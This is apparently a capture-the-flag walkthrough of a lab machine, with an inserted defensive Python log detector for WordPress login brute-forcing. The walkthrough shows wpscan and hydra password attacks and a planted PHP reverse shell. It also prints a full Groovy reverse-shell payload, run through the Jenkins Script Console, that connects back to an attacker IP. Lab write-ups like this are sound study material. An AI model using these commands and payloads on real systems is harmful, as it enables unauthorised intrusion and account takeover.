Target IP: 10.10.189.232
Challenge Description:
Performing a port scan using the command sudo nmap -sS 10.10.189.232 -p- -Pn returns the result shown above. By the looks of it, there are two TCP ports open on the target machine: SSH and HTTP on their standard ports.
Running an aggressive port scan using the command sudo nmap -sV -A 10.10.189.232 -p 22,80 against the target machine returns the result shown above. There is a web application running on the target machine. However, at the moment, the default Apache webpage is being served by the looks of it. I will start my enumeration at HTTP first.
Port 80: HTTP
The default Apache webpage, shown above, is returned when I visit this port in a web browser. I scanned the source code of this webpage but did not find anything useful. Time to perform a directory search.
I performed a directory search using the command gobuster dir -u http://10.10.189.232/ -w /usr/share/wordlists/dirb/big.txt -x html,php,txt and obtained the result shown above. There are multiple interesting entries such as /blog, /phpmyadmin, and /wordpress. I will start enumerating the /blog application first.
Visiting /blog shows the messy webpage above. It is a WordPress website.
Reading through the source code of the webpage shows its hostname is internal.thm, as shown above. I will insert this hostname into my /etc/hosts file now.
After inserting the hostname into my /etc/hosts file, the blog webpage is usable as shown above. I did some manual enumeration and found the user admin. I tried to log in using the default credentials, and others such as admin:admin and admin:root, but I had no luck. Time to enumerate further using wpscan. I tried to identify any vulnerable plugins using the command wpscan --url http://internal.thm/wordpress/ --enumerate ap --plugins-detection aggressive, but I had no luck. The only attack vector I have left now is to bruteforce the password of the user admin using wpscan.
To accomplish the password bruteforcing of the user admin, I used the command wpscan --url http://internal.thm/blog/ -P /usr/share/wordlists/rockyou.txt and got a hit! The user admin is using the password my2boys by the looks of it, as shown above.
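The wpscan password attack described in the two paragraphs above leaves a clear trace in the web server's access log: a burst of POST requests to wp-login.php from a single source. Below is an added example (not part of this writeup) of a small Python detector a defender could run over Apache access logs; it assumes the combined log format, treats a 200 response to the login POST as a failed attempt (WordPress re-renders the form) and a 302 as a successful login, and uses constructed sample log lines.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache combined log format (assumption: the blog is served by Apache with default logging).
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Constructed sample: one source hammers the WordPress login 12 times, then succeeds;
# a second source logs in once, normally.
SAMPLE_LOG = "\n".join(
    [f'10.14.55.153 - - [01/Jan/2024:10:00:{i:02d} +0000] '
     f'"POST /blog/wp-login.php HTTP/1.1" 200 4321 "-" "WPScan v3"' for i in range(12)]
    + ['10.14.55.153 - - [01/Jan/2024:10:00:12 +0000] "POST /blog/wp-login.php HTTP/1.1" 302 0 "-" "WPScan v3"',
       '192.0.2.7 - - [01/Jan/2024:10:00:05 +0000] "POST /blog/wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
       '192.0.2.7 - - [01/Jan/2024:10:00:06 +0000] "GET /blog/wp-admin/ HTTP/1.1" 200 9000 "-" "Mozilla/5.0"']
)


def parse(lines):
    """Yield (ip, timestamp, method, path, status) for each parseable log line."""
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            yield m["ip"], datetime.strptime(m["ts"], TS_FMT), m["method"], m["path"], int(m["status"])


def find_login_bruteforce(log_text, login_path="/blog/wp-login.php",
                          threshold=10, window=timedelta(seconds=60)):
    """Return {ip: {"failures": n, "success_after_burst": bool}} for sources that
    exceed `threshold` failed login POSTs within `window`, noting whether a
    successful login (302) followed the burst, i.e. the password was found."""
    failures = defaultdict(list)  # ip -> timestamps of recent failed attempts
    flagged = {}
    for ip, ts, method, path, status in parse(log_text.splitlines()):
        if method != "POST" or path.split("?")[0] != login_path:
            continue
        if status == 200:  # failed login: WordPress re-renders the form with a 200
            recent = [t for t in failures[ip] if ts - t <= window] + [ts]
            failures[ip] = recent
            if len(recent) >= threshold:
                flagged.setdefault(ip, {"failures": 0, "success_after_burst": False})
                flagged[ip]["failures"] = len(recent)
        elif status == 302 and ip in flagged:  # redirect after a burst: credentials now valid
            flagged[ip]["success_after_burst"] = True
    return flagged
```

The `login_path` parameter can be pointed at any other form-based login endpoint whose failure and success status codes behave the same way.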
I browsed to http://internal.thm/blog/wp-login.php to log in as the user admin. And bingo! After logging in successfully, the admin dashboard shown above was presented to me. Now I have access to the WordPress application as the admin. Time to enumerate further now. After digging around, I notice I can customise the themes; therefore, I can upload a PHP reverse shell to obtain a reverse shell connection.
I uploaded a copy of the Pentest Monkey PHP reverse shell, replacing the contents of the 404.php file in the twentyseventeen theme, as shown above. Then I started a listener on my machine at port 8443. Time to invoke the reverse shell connection!
And bingo! I browsed to http://internal.thm/blog/wp-content/themes/twentyseventeen/404.php to invoke the reverse shell. Now I have a reverse shell connection with the session as www-data on my machine at port 8443, as shown above.
I viewed the wp-config.php file and obtained the credentials wordpress:wordpress123 of the MySQL database, as shown above. However, I did not find anything when I viewed the database tables.
I transferred linpeas to the target machine and executed it, but I had no luck. After some manual enumeration, I found an interesting file called wp-save.txt at /opt as shown above. Now I have the password bubb13guM!@#123 which belongs to the user aubreanna. Can I switch to this user and escalate my privileges?
And bingo! Using su, I was able to switch to the user aubreanna by entering the password bubb13guM!@#123. I successfully elevated my privileges horizontally to the user aubreanna, as shown above. Time for further enumeration as this new user.
Inside the home directory of user aubreanna, I notice there is an interesting file called jenkins.txt. The content of this text file is shown above. By the looks of it, there is Jenkins running internally on port 8080.
And bingo! Running the command ss -ntplu confirms it: there is a service listening on port 8080. I can use SSH tunneling to expose this service outside the internal network so that I can connect to it from my machine, since I also have the password of the user aubreanna.
On my machine, I opened a new shell and entered the command ssh -L 4444:172.17.0.2:8080 aubreanna@internal.thm and the password bubb13guM!@#123 to perform SSH tunneling as shown above. Now I should be able to access the internal service on my machine at port 4444.
And bingo! Now I have access to the internal Jenkins service from my machine at port 4444. I tried to log in with default credentials, but I had no luck. I also tried to log in with the credentials I found previously, but again no luck. Seems like bruteforcing is the only attack vector left for me. Using hydra and the command hydra -l admin -P /usr/share/wordlists/seclists/Passwords/xato-net-10-million-passwords-10000.txt localhost -s 4444 http-form-post "/login?from=%2F:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in:Invalid username or password" -I, I managed to obtain the password spongebob for the user admin. After logging in successfully, I notice the Script Console is enabled. Therefore, I can obtain a reverse shell connection using this feature.
I started a listener on my machine at port 8444. Then I deployed the following code inside the Script Console:
String host="10.14.55.153";
int port=8444;
String cmd="/bin/bash";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()){
    while(pi.available()>0)so.write(pi.read());
    while(pe.available()>0)so.write(pe.read());
    while(si.available()>0)po.write(si.read());
    so.flush();
    po.flush();
    Thread.sleep(50);
    try{p.exitValue();break;}catch(Exception e){}
};
p.destroy();
s.close();
And bingo! Now I have a reverse shell connection with the session as jenkins, as shown above.
I located a note.txt file at /opt, and it contains the password of the user root. Time to access the root shell :)
Using the command ssh root@internal.thm and the new password tr0ub13guM!@#123, I managed to obtain a root shell. Now I have root access on the target machine, as shown above :)
The two flags are shown above.